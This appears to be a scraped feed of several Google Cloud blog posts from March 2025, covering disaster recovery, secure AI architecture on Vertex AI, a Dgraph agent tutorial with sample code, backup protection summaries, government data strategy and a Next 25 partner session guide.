JetStream works with both Windows and Linux VMs without any OS agents or guest OS modifications. Deployment is streamlined with deployment scripts and documentation. JetStream actively monitors and responds to runtime configuration changes such as VM property adjustments, and can hot-add or remove disks from protected VMs.

Failover and failback with runbook support
JetStream uses disk-level asynchronous replication and Compute Engine APIs for VM replication, for a general-purpose solution. It supports both failover and failback, and includes runbook support that provides DR administrators with fine-grained control over the recovery order of protected VMs. This includes the ability to achieve DR for stateless workloads, including SAP application servers.

DR drills
JetStream supports safe and non-disruptive failover testing. These test failovers don’t impact ongoing protection, allowing disaster recovery DR administrators to test and validate their recovery plans in a controlled environment, without risk.

Get started

Want to experience JetStream for GCE Disaster Recovery Orchestration? Try it now through the Google Cloud Marketplace with a free trial! Installation is straightforward; learn more here.

Read More for the details.

2025 03 21

GCP – Strengthening Google Developer Experts community with Google Cloud Champion Innovators

Tibor Kiss Cloud, Google Cloud gcp

Today, we’re excited to announce a significant milestone in deepening our developer communities: We’re fully integrating Google Cloud Champion Innovators (Champions) into the Google Developer Experts (GDE) program.

The Champion Innovators program was launched in 2022 to recognize and support developers demonstrating exceptional expertise and passion for Google Cloud technologies. For over 12 years, the GDE program has been a respected community for recognized experts across a wide array of Google technologies and other developer-facing products at Google such as Android, Firebase, Flutter, Angular, and Chrome. The program currently consists of over 1,100 thought leaders and community builders.

With the addition of the Champions, we are growing the GDE to over 1,400 members. Together, it will become a single, powerful community, streamlining resources and amplifying the impact of our most passionate experts.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e89a9167c70>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>

Bringing the community together

This transition is about more than just merging programs. It’s about amplifying the incredible work the Google Cloud GDEs (formerly Champions) do.

A broader community: The addition of Champions further enriches the impressive range of expertise in the GDE program. This cross-pollination of knowledge and experience will benefit all GDEs and the wider developer community. A combined directory of all Experts is available here.
Enhanced collaboration and support: A unified program means better communication, streamlined resources, and increased opportunities for collaboration. GDEs will have access to a wider network of peers, fostering even greater innovation and knowledge sharing.
A stronger voice for developers: By consolidating our programs, we’re creating a more powerful and unified voice for developers within Google and the industry as a whole.

Stay up-to-date on our GDEs

This transition provides greater avenues for GDE impact across developer communities. Meet a GDE at an event near you during the global Build with AI workshops featuring Google’s AI tools, Next 25, and DevFest in the second half of 2025!

You can also stay connected to our GDEs on our LinkedIn, X, and Medium.

Read More for the details.

2025 03 21

GCP – Mastering secure AI on Google Cloud, a practical guide for enterprises

Tibor Kiss Cloud, Google Cloud gcp

Introduction

As we continue to see rapid AI adoption across the industry, organizations still often struggle to implement secure solutions because of the new challenges around data privacy and security.

We want customers to be successful as they develop and deploy AI, and that means carefully considering risk mitigation and proactive security measures.

The four cornerstones of a secure AI platform

When adopting AI, it is crucial to consider a platform-based approach, rather than focus solely on individual models.

A secure AI platform, like a secure storage facility, requires strong foundational cornerstones. These are infrastructure, data, security and responsible AI (RAI).

Infrastructure is your foundation. Like the physical security of a storage facility, secure Google Cloud infrastructure (compute, networking, storage) is the AI platform on which your AI models and applications operate.
Data is your protected fuel. Data security is vital when developing AI powered applications. Protecting data from unauthorized access, modification, and theft is essential. Protected data can help safeguard AI integrity, ensure privacy compliance, and build customer trust.
Security is your shield. This layer protects the entire AI ecosystem by detecting, preventing, and responding to threats similar to a storage facility’s security systems. A strong AI security strategy should minimize your attack surface, detect incidents, and maintain confidentiality, integrity, and availability.
Responsible AI is your ethical compass. Building trust in enterprise AI systems is just as important as securing them. Responsible AI ensures that AI systems are used ethically and in a way that benefits society. This is like ensuring that a storage facility is used for its intended purpose and not for any illegal or unethical activities. RAI is based on the following:
1. Fairness: Use bias mitigation to ensure AI models are free from bias, and treat all users fairly. This requires careful data selection, model evaluation, and ongoing monitoring.
2. Explainability: Model transparency can make AI models transparent and understandable, so you can identify and address potential issues. Explainable AI can help build trust in AI systems.
3. Privacy: Data protection and compliance can protect user data and comply with privacy regulations. This includes implementing appropriate data anonymization and de-identification techniques.
4. Accountability: Establish clear lines of responsibility for the development and deployment of enterprise AI systems to ensure that there is accountability for the ethical implications of enterprise AI systems.

Responsible AI is essential for building trust in AI systems and ensuring that they are used in a way that is ethical and beneficial. By prioritizing fairness, explainability, privacy, and accountability, organizations can build AI systems that are both secure and trustworthy. To support our customers on their AI journey, we’ve provided the following design considerations.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e89d7dc61f0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Key security design considerations on Vertex AI

Vertex AI provides a secured managed environment for building and deploying machine-learning models as well as accessing foundation models. However, building on Vertex requires thoughtful security design.

1_Secure AIML Reference Architecture — Secure AI/ML deployment reference architecture.

In the architecture shown above, you can see that we recommend designing AI application security with the four key cornerstones in mind.

You can see here that Virtual Private Cloud (VPC) is the foundation of the platform. It isolates AI resources from the public internet, creating a private network for sensitive data, applications and models on Google Cloud.

We recommend using Private Services Connect (PSC) as the private endpoint type for Vertex AI resources (such as Notebooks and Model Endpoints.) These allow Vertex AI resources to be deployed into private VPC subnets to prevent direct internet access. It also allows applications deployed into private subnets within the VPC to securely make inference to the AI models privately.

VPC Service Control perimeters and Firewall Rules are used in addition to Identity and Access Management (IAM) to authorize network communication and block unwanted connections. This enhances the security of cloud resources and data for AI processing. Access levels can be defined based on IP addresses, device policies, user identity, and geographical location to control access to protected services and projects.

If there are requirements for private resources like notebooks to access the internet for updates, we recommend building a Cloud NAT, which can enable instances in private subnets to access the internet (such as for software updates) without exposure to direct inbound connections.

The reference architecture uses a Cloud Load Balancer (LB) as the network entry point for AI applications. The LB distributes traffic securely across multiple instances, ensuring high availability and scalability. Integrated with Cloud Armor, it protects against denial of service (DDoS) and web attacks.

reCAPTCHA Enterprise can prevent fraud and abuse, whether perpetrated by bots or humans. LBs inherent scalability can effectively mitigate DDoS attacks, as we saw when Google Cloud stopped one of the largest DDoS attacks ever seen.

Model Armor is also used to enhance the security and safety of AI applications by screening foundation model prompts and responses for different security and safety risks. It can perform functions such as filters for dangerous harassment, and hate speech. Additionally, Model Armor can identify malicious URLs in prompts and responses as well as injection and jailbreak attacks.

In this design, Chrome Enterprise Premium is used to implement a Zero Trust model, removing implicit trust by authenticating and authorizing every user and device for remote access to AI applications on Google Cloud. Chrome Enterprise Premium enforces inspection and verification of all incoming traffic, while a Secure Web Proxy manages secure egress HTTP/S traffic.

Sensitive Data Protection can secure AI data on Google Cloud by discovering, classifying, and protecting sensitive information and maintaining data integrity. Cloud Key Management is used to provide centralized encryption key management for Vertex AI model artifacts and sensitive data.

In addition to this reference architecture, it is important to remember to implement appropriate IAM roles when using Vertex AI. This enforces Vertex AI resource control and access for different states of the machine learning (ML) workflow. For example roles must be defined for data scientists, model trainers, model deployers etc.

Finally it is important to conduct regular security assessments and penetration testing to identify and address potential vulnerabilities in your Vertex AI deployments. Tools including Security Command Center, Google Security Operations, Dataplex and Cloud Logging can be used to enforce a secure security posture for AI/ML deployments on Google Cloud.

Securing the machine learning workflow on Vertex AI

Building upon the general AI/ML security architecture we’ve discussed, Vertex-based ML workflows present specific security challenges at each state. Address these unique concerns when securing AI workloads following these recommendations:

Development and data ingestion: Begin with secure development by managing access with IAM roles, isolate environments in Vertex AI Notebooks, and secure data ingestion by authenticating pipelines and sanitizing inputs to prevent injection attacks.
Code and pipeline security: Use IAM to secure code repositories with Cloud Source Repositories for access control and implement branch protection policies. Secure CI/CD pipelines using Cloud Build to control build execution and artifact access with IAM. Use secure image sources, and conduct vulnerability scanning on container images.
Training and model protection: Protect model training environments by using private endpoints, controlling access to training data and monitoring for suspicious activity. Manage pipeline components with Container Registry, prioritize private registry access control and container image vulnerability scanning.
Deployment and serving: Secure model endpoints with strong authentication and authorization. Implement rate limiting to prevent abuse. Use Vertex Prediction for prediction serving, and implement IAM policies for model access control and input sanitization to prevent prompt injections.
Monitoring and governance: Continuous monitoring is key. Use Vertex Model Monitoring to set up alerts, detect anomalies, and implement data privacy safeguards.

2_Secure MLOps Reference Architecture — Secure MLOPs reference architecture.

By focusing on these key areas within the Vertex AI MLOps workflow — from secure development and code management to robust model protection and ongoing monitoring — clients can significantly enhance the security of AI applications.

Confidential AI on Vertex AI

For highly sensitive customer data on Vertex AI, we recommend using Confidential Computing. It encrypts VM memory, generates ephemeral hardware-based keys unique to each VM that are unextractable, even by Google, and encrypts data in transit between CPUs/GPUs. This Trusted Execution Environment restricts data access to authorized workloads only.

It ensures data confidentiality, enforces code integrity with attestation, and it removes the operator and the workload owner from the trust boundary.

Get started today

We encourage organizations to prioritize AI security on Google Cloud by applying the following key actions:

Ensure Google Cloud best practices have been adopted for data governance, security, infrastructure and RAI.
Implement security controls such as VPC Service Controls, encryption with CMEK and access control with IAM.
Use the RAI Toolkit to ensure a responsible approach to AI.
Use Google Safeguards to protect AI models.
Ensure the importance of data privacy and secure practices for data management.
Apply security best practices across the MLOps workflow.
Stay informed: Stay up to date with the latest resources, including the Secure AI Framework (SAIF).

By implementing these strategies, organizations can be empowered to use the benefits of AI while effectively mitigating risks, ensuring a secure and trustworthy AI ecosystem on Google Cloud. Reach out to Google’s accredited Partners to help you implement these practices for your business.

Read More for the details.

2025 03 21

GCP – Building AI agents with Gen AI Toolbox for Databases and Dgraph

Tibor Kiss Cloud, Google Cloud gcp

We recently announced the public beta of Gen AI Toolbox for Databases, and today we’re excited to expand its capabilities through a new partnership with Hypermode.

Gen AI Toolbox for Databases is an open source server that empowers application developers to connect production-grade, agent-based generative AI (gen AI) applications to databases. Toolbox streamlines the creation, deployment, and management of sophisticated gen AI tools capable of querying databases with secure access, robust observability, scalability, and comprehensive manageability.

Currently, Toolbox can be used to build tools for a large number of databases: AlloyDB for PostgreSQL (including AlloyDB Omni), Spanner, Cloud SQL for PostgreSQL, Cloud SQL for MySQL, Cloud SQL for SQL Server and self-managed MySQL and PostgreSQL. Additionally, Toolbox is open-source, including contributions and support from Google partners such as Neo4j.

Today we are excited to announce Gen AI Toolbox support for Dgraph in partnership with Hypermode.

Dgraph by Hypermode is the fully open source, built-for-scale graph database for AI apps.

What sets Dgraph apart:

Real-time performance: Designed for real-time workloads with distributed architecture that processes queries in parallel
Horizontal scalability: Easily scales to handle growing data volumes and user demands
AI-native primitives: Features vector indexing, search, and storage capabilities that allow development teams to store multiple embeddings on any node
Flexible data modeling: Supports property graph models that represent complex relationships crucial for recommendation systems and knowledge graphs

The integration between Dgraph and Toolbox delivers significant advantages for application developers:

1. Simplified configuration & development

Straightforward setup: Just configure kind: dgraph in the source and kind: dgraph-dql in Toolbox
Toolbox handles database connectivity while you focus on building AI features

2. Production-ready infrastructure

Automated operational management including connection pooling, authentication, and resource allocation
Zero-downtime deployments through config-driven approach
Built-in support for common auth providers

3. Enterprise-grade observability

Out-of-the-box insights via logging, metrics, and tracing
Simplified debugging and monitoring for graph database operations

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e89d5b8b8b0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Real-world use case: Building an e-commerce agent

To demonstrate the power of the Dgraph integration with Toolbox within the Gen AI ecosystem, let’s explore how to build a product search and recommendation agent for a large ecommerce platform.

Modern ecommerce platforms need to deliver personalized experiences that help customers discover relevant products quickly. This requires:

Efficient product search capabilities
Personalized product recommendations based on user behavior and preferences
Natural language interaction with product catalog and reviews

Our solution uses a polyglot database approach:

AlloyDB for PostgreSQL: Stores transactional data including product catalog, purchase history, and inventory
Dgraph: Powers the knowledge graph for personalized product recommendations and understanding user reviews
LangChain: Orchestrates the agent workflow and LLM interactions
Gen AI Toolbox for Databases: Connects our agent to both databases with production-ready infrastructure

Creating a product knowledge graph with Dgraph

A knowledge graph powers the foundation for our ecommerce agent. We’ll model products, users, and user reviews as a property graph in Dgraph. This approach captures not just the data, but the knowledge of how these data are connected.

The property graph model consists of:

Nodes with labels: Defining the type of the node (Product, User, Review)
Relationships: Connecting nodes (`purchased_by`, `reviewed_by`, `similar_to`)
Properties: Key-value pairs with attributes of each type of node.

Here we can see how we will model our product knowledge graph:

DQL (Dgraph Query Language) is Dgraph’s native query language. Inspired by GraphQL and optimized for graph operations, DQL offers intuitive syntax for expressing complex relationships with features like reverse edges, cascading filters, and efficient variable binding. Its key advantages include performance on relationship-heavy queries, simplified traversal of connected data, and the ability to execute complex graph operations in a single query – making it ideal for recommendation engines, social networks, and knowledge graphs where entity relationships are crucial.

We can traverse the product knowledge graph stored in Dgraph to generate personalized recommendations. This is a common use case for graph databases like Dgraph due to the performance optimizations of traversing the graph to find products purchased by similar users or products with similar features. This type of query can be expressed simply using DQL, for example:

code_block: <ListValue: [StructValue([(‘code’, ‘query ProductRecommendations($productId: string) {rn # Get the current product detailsrn product(func: uid($productId)) {rn uidrn namern categoryrn }rnrn # Find users who purchased this productrn var(func: uid($productId)) {rn ~purchased_by @cascade {rn uid as uidrn }rn }rnrn # Find other products these users purchasedrn recommendations(func: has(name), orderasc: name) @filter((has(purchased_by) AND uid_in(purchased_by, uid) AND NOT uid($productId))) {rn uidrn namern categoryrn pricern ratingrn purchase_count: count(purchased_by)rn rn # Sort by most frequently purchasedrn orderDesc: val(purchase_count)rn }rn}’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e89d42918b0>)])]>

Defining our tools with Toolbox

Tools are defined using YAML with Gen AI Toolbox and represent parameterized database queries. Each tool includes a description of the input and output, which helps the LLM understand and determine which tool to call and use. See the documentation for more details on tool definition.

We are able to define tools that leverage both PostgreSQL and Dgraph, allowing our agent to seamlessly work with both databases. Here we see defining the Dgraph source and the Dgraph tool for finding product reviews. Other tools used include searching the product catalog and querying Dgraph for personalized recommendations.

code_block: <ListValue: [StructValue([(‘code’, ‘sources:rn my-dgraph-source:rn kind: dgraphrn dgraphUrl: http://localhost:8080rntools:rn get-product-reviews:rn kind: dgraph-dqlrn source: my-dgraph-sourcern statement: |rn query all($asin: string){rn productReviews(func: type(Product), first: 10) @filter(eq(Product.asin, $asin )) {rn uidrn Product.asinrn Product.reviews {rn Review.titlern Review.textrn Review.ratingrn }rn }rn }rn isQuery: truern timeout: 20srn description: |rn Use this tool to find product reviews for a specific product.rn parameters:rn – name: asinrn type: stringrn description: The product ASIN’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e89d69f3df0>)])]>

Building your agent with LangChain

Now we’re ready to create our agent. We’ll use the LangChain framework, which implements a client for Gen AI Toolbox. We’ll connect to the Toolbox server and load the toolset, a description of the tools available to our agent, provided by Toolbox. Since we’ll be implementing a chat interface for our agent, we’ll use LangChain’s agent memory component. While LangChain supports many models, we’ll make use of Gemini Pro via Google’s Vertex AI cloud service.

code_block: <ListValue: [StructValue([(‘code’, ‘# Connect to Toolbox server and load the toolsetrntoolbox = ToolboxClient(“http://127.0.0.1:5000″)rntools = toolbox.load_toolset()rnrn# Initialize a memory componentrnmemory = ConversationBufferMemory(rn memory_key=”chat_history”,rn return_messages=Truern)rnrn# Agent promptrnprompt = ChatPromptTemplate.from_messages([rn (“system”, “””rn You are a helpful product search assistant. Your job is to help users find products they’re looking for using your tools.rn”””), rn MessagesPlaceholder(variable_name=”chat_history”),rn (“human”, “{input}”), rn MessagesPlaceholder(variable_name=”agent_scratchpad”)rn])rnrn# Use Gemini Pro LLMrnllm = ChatVertexAI(rntmodel=”gemini-1.5-pro-002″, rnttemperature=0, rntconvert_system_message_to_human=Falsern)rnrn# Create agent and agent executorrnagent = create_tool_calling_agent(llm, tools, prompt)rnagent_executor = AgentExecutor(agent=agent, tools=tools, verbose=True, memory=memory,tool_choice=”any” )’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e89d69f3d60>)])]>

Now when we run our Python script we have a natural language chat interface to our agent. With each interaction the agent will determine if it has enough information and context to respond to the query and if not will select a tool from the toolset provided by Toolbox. Toolbox also handles the logic of invoking the tool – which involves managing database connection pools, authentication to the database, and the query request/result lifecycle.

The result: A powerful gen AI-powered shopping assistant

With this implementation, we’ve created a natural language interface that can:

Help customers search for products using natural language
Provide detailed product information from PostgreSQL
Generate personalized product recommendations based on the knowledge graph in Dgraph
Surface relevant product reviews to aid purchase decisions

All of this is made possible by Gen AI Toolbox for Databases, which handles the complexity of database connectivity, authentication, and query execution while the agent focuses on delivering a seamless user experience.

Get started

Ready to build your own database-connected agents? Try Gen AI Toolbox with Dgraph support today:

Join the Hypermode community or to share your experiences and get help building your own solutions!

Read More for the details.

2025 03 21

GCP – Introducing protection summary, a new Google Cloud Backup and DR feature

Tibor Kiss Cloud, Google Cloud gcp

In today’s cloud environments, data protection is paramount. Ensuring your backups are configured correctly and aligned with your business continuity requirements is critical for business continuity and resilience against threats like ransomware. However, understanding your backup coverage across a complex cloud environment can be challenging. That’s why we’re excited to announce the preview of protection summary, a new feature in Google Cloud Backup and DR that provides a centralized view of your backup configurations, helps you identify gaps in your data protection, and empowers you to take action to improve your resilience.

We’re enhancing the efficiency and visibility of your VM data protection with two new key features: protection summary and the data protection tab. This blog will focus on protection summary, a new capability designed to provide a consolidated, at-a-glance view of your VM’s backup state. Complementing this, our second launch of the data protection tab brings together backup and continuous data replication options for block storage in a single unified interface. Click here to learn more.

Introducing protection summary

Protection summary, a new capability in the Google Cloud Backup and DR management experience, allows you to view the backup configuration state of your resources. Protection summary helps you to easily identify resources that have not been configured for backup, discover those that are configured and identify areas where you can enhance your data protection.

Identify resources with no backup configuration

Quickly discover resources that lack any backup configuration and take immediate steps to protect them. Supported resource types include Compute Engine VMs and Cloud SQL instances.

While some workloads such as test environments may not need any data protection at all, most production workloads need data protection from temporary outages, disasters, user errors, and malware.

Protection summary evaluates various data protection options offered by Google Cloud to determine if backups are configured for a resource. If a VM has a backup plan, a template for backups in the Backup and DR Service management console, or if any of the disks have a snapshot schedule, then it is considered configured for backup. This definition does not include any third-party or custom protection tools that you may be using.

If there are no such data protection options being used, protection summary lists them under “backups not configured”, thus helping you identify gaps in protection.

Configure backups for resources

For resources that are listed as having backups not configured, protection summary allows you to assess the available backup options for a resource type and select the appropriate option based on your needs. For Compute Engine, available backup options include backup plans offered by the Backup and DR service and snapshot schedules offered by Compute Engine. For Cloud SQL instances, you can configure automated backups offered by Cloud SQL. Choose the option that works best for you and continue to configure backups.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e7619b078e0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Assess backup configurations

Easily view how your current backup setup looks and identify areas for improvement. Understand your vulnerability to ransomware attacks and implement best practices like backup vaults to protect your backups from deletion or corruption.

When the configuration state is ‘vaulted’, it means backups are stored in a backup vault. This vault uses an enforced retention setting to provide immutability, preventing bad actors from deleting your backups.
When the configuration state is ‘not vaulted’, it means backups are not stored in the backup vault and are stored using other backup capabilities. While this serves many common needs, they do not offer the same level of enforced retention as a backup vault.

You can also review the details of configuration state, backup schedules, location and last successful backup time to ensure they meet your requirements.

How it works

To view the protection summary for your resources, simply navigate to the Backup and DR management experience in the Google Cloud console. Enable the Backup and DR API in the project where you want to view the protection summary.

Navigate to the protection summary page and select the region and resource type of your choice to proceed. You can now view all the resources split into two tabs based on their backup configuration state.

Finally, to ensure that you have data protection enabled from the get-go, you can add protection by selecting suitable options while creating your Compute Engine VMs. Read more about how to set up this protection on our other blog on Data Protection.

Get started today

Protection summary is now available in preview in the Google Cloud Backup and DR management experience. Try it out today and get visibility into your backup configuration state. Learn more here.

Read More for the details.

2025 03 21

GCP – The three pillars of data-driven government

Tibor Kiss Cloud, Google Cloud gcp

Over just the past few years, Artificial Intelligence and Machine Learning (AI/ML) have remarkably transformed IT and data science at the enterprise level. Yet, the public sector is still working through some significant “growing pains” adapting Data & AI strategies and infrastructure to improve and accelerate public services.

Google’s experiences across the Public Sector have led us to offer an adaptable framework for governments for defining and refining your government’s AI & data access strategy. We can break it down into three core pillars:

1. Defining a government Data Access Platform (DAP): A platform where individuals and businesses can easily find and access government data. This platform should be user-friendly with robust search capabilities, clear access routes, and strong governance protocols.

Key points to consider:

An authoritative single point-of-entry to access major regional and local government datasets, whether held in the platform itself or elsewhere.
Allowing users to both search and preview the data, based upon metadata in a uniform schema around their unique requirements.
Providing a clear route to access–either directly via the platform itself, or facilitating direct peer-to-peer access to the actual data owner.
Robust governance and fine-grained control of who accesses what–private versus public datasets.
Hosting across multiple data formats: tables, text, videos, and geospatial information and timeseries.
An API driven platform that allows for applications (public and private) to be built on top of the data services it provides.

2. Assembling a central DAP empowerment team: A dedicated team responsible for building, managing, and promoting the data access platform. This team should set clear goals, measure success, establish governance principles, incentivize participation, and provide training and support to the government departments:

Builds, owns, and operates the cross-government data access platform, as well as recommends additional integrated components.
Defines benefits to the public: better and faster public services, simpler user interactions.
Sets, captures, and reports metrics: success among users and overall impacts.
Sets core strategy and governance principles: primary data owners/datasets, metadata, formats (proprietary or open source).
Incentivizes adherence within or between departments–including funding, penalties, or recognition.
Coordinates necessary training and upskilling to modern technologies.
Manage relationships with a set of trusted partners who can assist with the full scope of data implementation.

3. The DAP-empowered ministry / government agency: As both contributors and beneficiaries of the (DAP) and the services of the central DAP empowerment team, the ministries or the government agencies should focus on a series of continual goals and strategies:

Establish a dedicated team of analysts capable of adeptly leveraging AI/ML tools and answering queries–proficient in data analysis, interpretation, and visualization, and able to respond to information requests from both internal and external stakeholders.
Manage internal data to high standards, ensuring data quality, accuracy, completeness, and consistency, as well as implementing robust data governance and security protocols.
Integrate with the DAP’s tiered access system–align existing data management systems with the DAP’s access controls to ensure appropriate data sharing and security across different levels of users.
Make selected data available to the DAP–identify and share relevant data with the DAP to contribute to broader government-wide data initiatives in support of informed decision-making.
Develop a set of in-house tools and capabilities to complement DAP-provided tools, where needed: specialized analytical tools, data visualization dashboards, or data management workflows tailored to the specific needs of the agency.

Meet us at Google Cloud Next 25 in Las Vegas

For deeper technical perspectives on redefining your department’s data strategy–including the emerging integral roles of leading-edge AI/ML– be sure to join us at Google Cloud Next ‘25, taking place April 9-11 in Las Vegas. We’ll showcase Google’s latest AI and cloud innovations, designed to empower agencies across the public sector and meet their missions.

Read More for the details.

2025 03 20

GCP – Google Cloud Next 25 Partner Summit: Session guide for partners

Tibor Kiss Cloud, Google Cloud gcp

Partner Summit at Google Cloud Next ’25 is your opportunity to hear from Google Cloud leaders on what’s to come in 2025 for our partners. Breakout Sessions and Lightning Talks are your ticket to unlocking growth, mastering AI, and conquering the cloud marketplace. Sign-up today to secure your seat in one of the 40+ exclusive sessions at Partner Summit.

Need some help deciding where to prioritize your time? Our Google Cloud partner leaders have some ideas!

Jim Anderson, VP, NA Partner Ecosystem and Channels, Google Cloud

“AI is transforming how businesses discover, utilize, and manage data. Many customers have shared that adopting AI technology will require them to reimagine their business strategies. As we guide our customers through this transformation, it’s crucial to have a partner ecosystem that can offer the necessary industry and process expertise. This session shares valuable insights into how Google’s Go-To-Market teams are approaching this challenge, and how we can partner to deliver better customer outcomes.”

Jim recommends:

PAR101: North America’s business leaders on the AI revolution and verticalization: Discover the latest trends shaping the region, and gain actionable insights to embrace unprecedented opportunities and exceed customer expectations in this transformative age.

Troy Bertram, Managing Director, Public Sector Partner Ecosystem, Google Public Sector

“We are seeing incredible momentum within the public sector as organizations look to leverage Google AI to drive meaningful impact. Our partners are at the forefront of this evolution, building solutions that empower public servants and improve citizen outcomes. At Google Public Sector, we’re empowering partners to deliver secure, scalable, and innovative solutions that address the unique needs of government agencies, educational institutions, and nonprofits. Partners benefit from our go-to-market differentiators, including access to Google Public Sector’s Rapid Innovation Team (RIT), Delivery Expertise Badges, specialized SecOps resources, and subscription agreements. Public sector organizations are tackling some of society’s most pressing challenges, and our ecosystem’s expertise is vital in helping them achieve their missions.”

Troy recommends:

PAR106: Public Sector AI innovation and partner go-to-market: Learn new GTM strategies, understand co-sell, and how to utilize US Public Sector Deal Registration Discount, Partner Development Sprints, and the Rapid Innovation Team, all designed to accelerate partner success.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e1b5206b5b0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>

Javier Carrique, Director, Partner Ecosystem & Channels, LATAM, Google Cloud

“We are building the foundation for future market leadership by strategically evolving our go-to-market engine to diversify our customer base and dramatically enhance market reach. Our approach includes a strong emphasis on portfolio and value differentiation, harnessing the innovation of generative AI to create distinct market advantages, empowering our Partners for mutual growth and expanded reach, and establishing a clear and influential voice in the industry to attract a wider range of clients.”

Javier recommends:

PAR103: Leveraging AI for partner success in LATAM: Capitalize on opportunities in LATAM & cutting edge AI technology to boost your organization’s revenue.
PARLT103: Generative AI training for partners: As AI becomes increasingly integrated into various industries, customers will demand partners who understand and can leverage this technology. Exclusive training ensures the partner ecosystem is prepared to meet these evolving needs.

Aimee Catalano, Senior Director, Global Partner Marketing, Google Cloud

“These sessions should be on the agenda of every marketer interested in capitalizing on Google Cloud’s benefits and resources. We offer critical overviews into our Partner Marketing Studio & various incentive offerings, sharing best practices and how to find the right programs for your business. We also showcase how we’ve integrated AI tools seamlessly into your existing workflows in order to optimize your campaigns and increase ROI. ”

Aimee recommends:

PARLT107: Excelling with Marketing Funds: program overview and tips for success: Walk through eligibility, funding options, and best practices to help you maximize impact.
PARLT108: Maximize your marketing with Google Cloud: Leverage key tools and techniques, like Partner Marketing Studio, to enhance campaigns and optimize resources.

Bruno Heese, Managing Director, Partners and Channels, EMEA, Google Cloud

“The EMEA region presents a dynamic and significant opportunity for growth, and our partners are central to realizing this potential. At Partner Summit, we will be sharing Google Cloud’s strategic vision and investment priorities for EMEA, emphasizing the key industry verticals and emerging technology trends that are ripe for innovation. In a panel with partners Devoteam and Deloitte, we will also delve into the crucial aspect of driving AI adoption across the region, exploring how partners can position AI as a transformative force for their customers and develop AI-powered solutions leveraging Google Cloud’s comprehensive suite of AI tools. For EMEA partners looking to maximize their potential and achieve significant growth with Google Cloud, this is a key session to attend.”

Bruno recommends:

PAR102: Driving AI innovation through joint opportunities in EMEA: Discover Google Cloud’s vision & investment priorities in EMEA for 2025. We’ll discuss how partners are capitalizing on opportunities to build presence in multiple markets and address generative AI implementation challenges.

Colleen Kapase, VP, Channels & Partner Programs, Google Cloud

“To thrive in today’s rapidly shifting landscape of customer expectations and emerging technologies, our partner ecosystem and programs are adapting to meet customers where they’re at. These three sessions will highlight how partners can drive revenue through joint co-selling, make the most of our incentives, and accelerate customer AI projects. Together, your organization and Google Cloud will show up for customers as one team. ”

Colleen recommends:

PAR107: Partner programs: Growing together in the age of AI: Learn how to stand out as a valued partner as we share our plans for co-Sell and services opportunities, new initiatives & key metrics designed to recognize and amplify partner contributions, and exciting investment opportunities.
PAR108: Maximizing profits with incentives & benefits: Unlock proven practices to optimize partner benefits and incentives, including programs that reward your success in driving customer cloud adoption
PAR109: Unlocking new revenue streams with Google AI: Open up new revenue streams by building profitable AI offerings that engage customers, accelerate deals, and showcase real-world ROI.

Anthony McMahon, Managing Director, Partners and Corporate Business, APAC

“Google Cloud is experiencing rapid growth in the APAC market, powered by our partner ecosystem. This session will outline our 2025 strategy for continued growth in the region and highlight how partners can contribute and differentiate themselves. We will also discuss how, together, we can capitalize on the AI opportunity in APAC.”

Anthony recommends:

PAR104: Winning together: The AI opportunity in APAC: Unlock the secrets to dominating the APAC market. Get the inside scoop on our 2025 strategy and learn how to position yourself for explosive growth. If APAC is your play, this session is your win.

Victor Morales, VP, Global System Integrators Partnerships, Google Cloud

“Excelling with Google Cloud industry solutions means you can apply or build upon our horizontals to address niche or industry-specific business challenges. Learn how our GSIs tailor different offerings to ensure partner and customer success.”

Victor recommends:

PARLT104: Leading the way in industry: The Google Cloud playbook: Discover Google Cloud’s industry approach & strategy. Hear from a fellow partner on how we jointly worked to bring a new solution to market and the Google Cloud resources and tools they leveraged for success.

Stephen Orban, VP, Migrations, ISVs, and Marketplace, Google Cloud

“Enterprise software is undergoing a seismic transformation. Cloud marketplaces are changing how enterprises find, use, and manage software, with billions transacted through the Google Cloud Marketplace in 2024. Artificial Intelligence, including agentic AI, is changing how workers in every industry interact and benefit from ISV solutions. These two sessions will help our ISV and Technology Partners understand how building AI into their software solutions and transacting through the Google Cloud Marketplace will accelerate their growth and deliver better customer outcomes.”

Stephen recommends:

PARLT119: Accelerate co-sell readiness with Google Cloud Marketplace: Designed for ISV partners, spur your path to co-sell success with Google Cloud. Gain a clear roadmap to co-sell readiness with resources designed specifically for you.
PAR111: Transforming technology partnerships: An AI-first GTM playbook for ISVs: Discover how to integrate AI into your go-to-market strategy and stay ahead of the curve. It’s not just about AI; it’s about AI that works for you.

Yumi Ueno, MD, Japan Partner Ecosystem and Channels, Google Cloud

“Japan, a cornerstone of the global economy, is poised for a significant transformation. While facing challenges such as demographic shifts and the need for optimized data infrastructures, these very conditions present compelling opportunities for strategic AI deployment, particularly in the realm of generative AI. Google Cloud, in close collaboration with our valued partners, is dedicated to delivering impactful, scalable solutions that drive tangible business outcomes in the Japanese market.”

Yumi recommends:

PAR105: Driving business with gen AI in Japan: Discover how generative AI is reshaping the Japanese business landscape, the current market dynamics, and unveil Google Cloud’s strategic AI initiatives.

